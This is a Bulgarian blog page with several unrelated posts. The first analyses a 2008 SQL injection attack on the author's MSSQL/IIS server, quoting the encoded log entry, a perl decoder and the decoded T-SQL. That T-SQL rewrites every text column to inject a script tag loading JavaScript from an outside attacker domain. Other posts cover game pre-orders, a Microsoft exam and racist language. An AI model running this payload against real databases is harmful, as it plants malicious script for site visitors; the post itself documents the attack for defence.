Nobody’s Life | Some nonsense, blogged in entertaining order…

Това вече минава границата на пародията.
Наглост до дупка. И овчедушие също.

Прекъсвам малко отпуската на блога, за да споделя опита с последната мода в SQL Injection атаките.
(конкретния пример е за MSSQL Server 2005 и IIS уеб-сървър)
В IIS лога би трябвало да имам нещо такова :

2008-08-28 00:00:41 GET /URL.aspx?<вашите -си-параметри>;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×44454..<махнато>..%20AS%20CHAR(4000));EXEC(@S); - 61.152.106.142 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+InfoPath.1) - 302 392

След като прочетете шестнайсетичниа код ето така :

echo “<тук-вкарайте-всичко след 0x...>” | perl -pe ’s/(..)/chr(hex($1))/ge’

излиза това :

DECLARE @T varchar(255),@C varchar(4000)

DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

OPEN Table_Cursor

FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN
exec(’update [’+@T+’] set [’+@C+’]=””></title><script src=”http://www0.douhunqn.cn/csrss/w.js”></script><!–”+[’+@C+’] where ‘+@C+’ not like ”%”></title><script src=”http://www0.douhunqn.cn/csrss/w.js”></script><!–”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END

CLOSE Table_Cursor

DEALLOCATE Table_Cursor

(разкрасил съм го малко, за да стане по-четлив)

Интересна е хронологията на на атаката, защото преди известно време (в моя случай около май) е имало още един подобен request, който е целял единствено да провери дали сървъра ще отговори за определено време - 20 секудни. Така се набелязват сървърите, които след това се атакуват.

Дали са станали страхливи хакерите или прост ни дават един още един шанс за защита…

Този блог излиза в отпуска за неопределено време.

Невероятна обиколка! Надявам се да успея да мина още 1-2 пъти преди да я преместят.

Невероятно видео. Час и половина.

Fallout 3 е достъпен за pre-order вече. За съжаление засега само в US. UK предлагат pre-order също, но не и този вариант.

Ozone.bg предлагат и Fallout Collection за загрявка преди началото. Без такса за доставка.

Вчера минах 070-528. Втория в поредицата.
По принцип смятам подобни изпити за малко безмислени в случая, но тръгнах по модата така да се каже и реших да взема туз-онуз.
Та, току що си проверявам транскрипта и какво да видя :

P.S. След рефреш не се оправя.

Винаги ме учудва как интелигентни хора (поради липса на по-добра и описателна дума), понякога изричат неща, които могат рязко да променят отношението ми към тях (въпреки, че да речем се познаваме от еди-колко-си-време или казаното е било малко или много на майтап).
Днес например ми се случи да чуя няколко пъти забележка по отношение на циганите и чернокожите все от хора, които смятам за образовани (разбирай чели са повече книги от колкото има в материала до 12 клас). Като начало в името “циганин” няма нищо срамно или обидно. Ако те искат да се наричат така или някои друг иска да ги нарича по друг начин това е тяхно/негово право, разбира се. За чернокожите - дали е чернокож или негър, за мен все си е обидно. Защо на белите не им викат “белокожите”. Човек се ражда на едно място и избира да живее на друго място. По това трябва да се определя как се нарича. Не може да наричаш цяла група от обществото - “чернокожи”. Това означава да ги делиш по цвят на кожата, което освен, че е тъпо, не индикира нищо.
Докато съществуват подобни думи - “чернокожи”, “цигани”, “роми” ще има и расизъм. Докато има расизъм, ще ги има и тези думички и обидното отношение, което произлиза от тях. Така, че кое първо да елиминираме?

П.С. Както винаги поста подлежи на коментари, от които мога да си извадя поука и/или евентуално да си променя мнението за определни неща.

П.П.С. Някои думички или термини може да са повлияни от професионалното ми поприще.